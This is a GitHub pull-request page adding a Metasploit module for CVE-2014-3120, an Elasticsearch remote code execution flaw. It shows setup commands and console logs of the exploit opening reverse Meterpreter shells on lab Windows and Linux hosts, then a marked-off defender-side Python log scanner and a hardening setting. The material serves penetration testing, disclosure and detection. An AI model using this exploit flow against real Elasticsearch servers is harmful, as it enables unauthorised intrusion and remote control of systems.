Add module for CVE-2014-3120 #3397

Merged
merged 1 commit into rapid7:master from jvazquez-r7:elasticsearch_rce on May 29, 2014

Conversation

jvazquez-r7
Contributor

Tested ok with ElasticSearch 1.1.1 on Windows and Linux.

Verification

juan@ubuntu:~$ curl -XPUT 'http://localhost:9200/twitter/'
{"acknowledged":true}juan@ubuntu:~$ 
  • Add at least one document to the index
curl -XPUT 'http://localhost:9200/twitter/tweet/1' -d '{
> "user" : "kimchy",
> "post_date" : "2009-11-15T14:12:12",
> "message" : "trying out Elasticsearch"
> }'
{"_index":"twitter","_type":"tweet","_id":"1","_version":1,"created":true}juan@ubuntu:~$
  • Run the module like in the demo, hopefully enjoy sessions

DEMO

  • Windows
msf exploit(script_mvel_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.157:9200 - Trying to execute arbitrary Java..
[*] 172.16.158.157:9200 - Asking remote OS...
[+] 172.16.158.157:9200 - OS Windows XP found
[*] 172.16.158.157:9200 - Asking TEMP path
[+] 172.16.158.157:9200 - TEMP path found on C:\WINDOWS\TEMP\
[*] Sending stage (30355 bytes) to 172.16.158.157
[*] Meterpreter session 14 opened (172.16.158.1:4444 -> 172.16.158.157:1954) at 2014-05-27 17:59:01 -0500
[!] This exploit may require manual cleanup of: C:\WINDOWS\TEMP\DpFVdq.jar

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.157 - Meterpreter session 14 closed.  Reason: User exit
  • Linux
msf exploit(script_mvel_rce) > set rhost 172.16.158.159
rhost => 172.16.158.159
msf exploit(script_mvel_rce) > check
[+] 172.16.158.159:9200 - The target is vulnerable.
msf exploit(script_mvel_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.159:9200 - Trying to execute arbitrary Java..
[*] 172.16.158.159:9200 - Asking remote OS...
[+] 172.16.158.159:9200 - OS Linux found
[*] Sending stage (30355 bytes) to 172.16.158.159
[*] Meterpreter session 15 opened (172.16.158.1:4444 -> 172.16.158.159:46011) at 2014-05-27 17:59:46 -0500
[+] Deleted /tmp/sMenGK.jar

meterpreter > getuid
Server username: elasticsearch
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux 3.8.0-29-generic (i386)
Meterpreter : java/java
meterpreter > exit -y
[*] Shutting down Meterpreter...
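
As an added defender-side example (not part of this PR or of the module it adds), a small Python scanner over constructed reverse-proxy access-log lines: it flags `_search` requests whose JSON body carries a `script` or `script_fields` key, which is how MVEL dynamic scripts reach an Elasticsearch 1.x node in this CVE. The log format, the field names and the sample requests are assumptions, and the script body in the flagged line is replaced by a placeholder.

```python
import json
import re

# Constructed sample lines (not from the PR): one HTTP request per line, as a reverse
# proxy in front of an Elasticsearch 1.x node might log it. Assumed format:
#   <client_ip> "<METHOD> <path>" <status> <request body as JSON>
SAMPLE_LOG = """\
10.0.0.5 "PUT /twitter/tweet/1" 201 {"user":"kimchy","message":"trying out Elasticsearch"}
10.0.0.5 "POST /twitter/_search" 200 {"query":{"match_all":{}}}
10.0.0.9 "POST /_search?pretty" 200 {"size":1,"query":{"match_all":{}},"script_fields":{"cmd":{"script":"[omitted]"}}}
10.0.0.9 "POST /_search" 200 {"aggs":{"x":{"terms":{"script":"doc['user'].value"}}}}
10.0.0.7 "GET /_nodes" 200 {}
"""

LINE_RE = re.compile(r'^(\S+) "(\w+) (\S+)" (\d{3}) (.*)$')
SCRIPT_KEYS = {"script", "script_fields"}


def find_script_keys(node, path=""):
    """Recursively collect the JSON paths of every key named in SCRIPT_KEYS."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key in SCRIPT_KEYS:
                hits.append(here)
            hits.extend(find_script_keys(value, here))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_script_keys(item, f"{path}[{i}]"))
    return hits


def scan_log(text):
    """Return one finding per _search request whose body carries a script anywhere."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format; skip rather than guess
        client, method, target, _status, body = m.groups()
        if "_search" not in target.split("?", 1)[0].split("/"):
            continue  # this scanner only inspects search requests
        try:
            doc = json.loads(body)
        except json.JSONDecodeError:
            continue
        hits = find_script_keys(doc)
        if hits:
            findings.append({"client": client, "method": method, "target": target, "script_paths": hits})
    return findings
```

On Elasticsearch 1.x the server-side fix is `script.disable_dynamic: true` in elasticsearch.yml (the default from 1.2.0 onwards); the scanner only helps spot attempts in traffic that has already reached the node.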

@wchen-r7 wchen-r7 self-assigned this May 28, 2014
@wchen-r7 wchen-r7 merged commit 7a29ae5 into rapid7:master May 29, 2014
@jvazquez-r7 jvazquez-r7 deleted the elasticsearch_rce branch November 18, 2014 15:46